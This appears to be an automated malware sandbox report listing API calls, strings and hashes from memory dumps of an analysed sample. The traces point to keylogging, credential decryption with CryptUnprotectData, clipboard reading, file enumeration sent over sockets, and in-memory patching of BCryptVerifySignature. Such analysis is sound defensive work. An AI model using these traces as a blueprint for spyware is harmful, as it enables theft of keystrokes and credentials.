                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                                                    • Opcode ID: 5bd1892f5c3054d7829bd4d098cb7dbb95dbb5cc12f56c21c1b8cf845f142e1e
                                                                                                                                                                                    • Instruction ID: d9e73235e8114bfa58b44482306f347dbc64c6cf8c27aaf6ec47c5dd67652310
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bd1892f5c3054d7829bd4d098cb7dbb95dbb5cc12f56c21c1b8cf845f142e1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131527690422E5ADB10DEA0CC98EDFB77CBF45244F800AE6E655D2041EF71A6C8CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 15CAA2D3
                                                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,15CAA2A4,00000000), ref: 15CAA2E1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 15CAA2ED
                                                                                                                                                                                      • Part of subcall function 15CBB4EF: GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    • GetMessageA.USER32 ref: 15CAA33B
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 15CAA34A
                                                                                                                                                                                    • DispatchMessageA.USER32 ref: 15CAA355
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Keylogger initialization failure: error , xrefs: 15CAA301
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                                                                                    • Opcode ID: a8824c2911020c9208ca5fcf8fab210019eac3e12a18c090c9b6ec687b2ef299
                                                                                                                                                                                    • Instruction ID: d333b26ca5850965522291b29c27977e886d2ce3856cad71cd4c0eabc18e07a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8824c2911020c9208ca5fcf8fab210019eac3e12a18c090c9b6ec687b2ef299
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211C4336142526BCB106FB9CC4889B7BFCEA81A15B40596EF886C2140FF70E504CBA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9212
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9236
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE93BD
                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,15CFF234), ref: 15CE93CF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D12764,000000FF,00000000,0000003F,00000000,?,?), ref: 15CE9447
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,15D127B8,000000FF,?,0000003F,00000000,?), ref: 15CE9474
                                                                                                                                                                                    • _free.LIBCMT ref: 15CE9589
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                    • Opcode ID: 9fdcce17e6cf3e6cfaed0f7962123a4a32a32ebb6211dfbdd4d8b05b7cb63a6d
                                                                                                                                                                                    • Instruction ID: d98ba785b2126be128856fbd7264ed29dd23c797a6751cdfc85e1d0b22df9142
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fdcce17e6cf3e6cfaed0f7962123a4a32a32ebb6211dfbdd4d8b05b7cb63a6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DC12776E04355ABDB11CF79C880AEEBFB9FF45210F14099AD89597280EB35AE42CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString,03295360,03249A30), ref: 03247AD2
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30,ScanString), ref: 03247ADF
                                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360), ref: 03247AF6
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,ScanString,03295360,03249A30,Initialize,03295360,03249A30,UacScan,03295360,03249A30,UacInitialize,03295360,03249A30), ref: 03247B05
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                                                                                    • Opcode ID: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                                                    • Instruction ID: fd964304142c1fba584ed23fdcc5d5399decbdcf6e3ad5db5ff8a691cc46f346
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0E9755153553ED121E1685C80EBF629CDBC37A0F04463DF5749A180D7A18884C7F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                    • Opcode ID: 0c11151764c6c1096354e12b350621ca1e5a112aa22111f3184f4bbbf87a4324
                                                                                                                                                                                    • Instruction ID: 1cc6806f182770a243c2026f1802477e5f0b262f6065c0f1252f4947d9a21864
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c11151764c6c1096354e12b350621ca1e5a112aa22111f3184f4bbbf87a4324
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41C24972E086298FDB65CE28DD807D9B7B5FB44305F1149EBD54EE7240E774AA818F40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CB179C: SetLastError.KERNEL32(0000000D,15CB1D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15CB1CFA), ref: 15CB17A2
                                                                                                                                                                                    • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15CB1CFA), ref: 15CB1D37
                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 15CB1DA5
                                                                                                                                                                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 15CB1DC9
                                                                                                                                                                                      • Part of subcall function 15CB1CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,15CB1DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 15CB1CB3
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 15CB1E10
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 15CB1E17
                                                                                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CB1F2A
                                                                                                                                                                                      • Part of subcall function 15CB2077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15CB1F37,?,?,?,?,00000000), ref: 15CB20E7
                                                                                                                                                                                      • Part of subcall function 15CB2077: HeapFree.KERNEL32(00000000), ref: 15CB20EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3950776272-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15CA8811
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,15D06608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88CA
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 15CA88F2
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA88FF
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15CA8A15
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1771804793-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32), ref: 15CA6A82
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15CA6A89
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                                    • API String ID: 2574300362-2380590389
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 15CBB509
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 15CDBC1A
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 15CDBC24
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 15CDBC31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,15CD34BF,00000034,?,?,00000000), ref: 15CD3849
                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,15CD3552,00000000,?,00000000), ref: 15CD385F
                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,15CD3552,00000000,?,00000000,15CBE251), ref: 15CD3871
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15CA7857
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 15CA791F
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4113138495-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,15CF3326,?,?,00000008,?,?,15CF61DD,00000000), ref: 15CF3558
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 03237FB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1705453755-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,0325A106,00000000,0325A11E), ref: 0323B756
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0323BE2E,00000000,0323C047,?,?,00000000,00000000), ref: 0323A7DF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
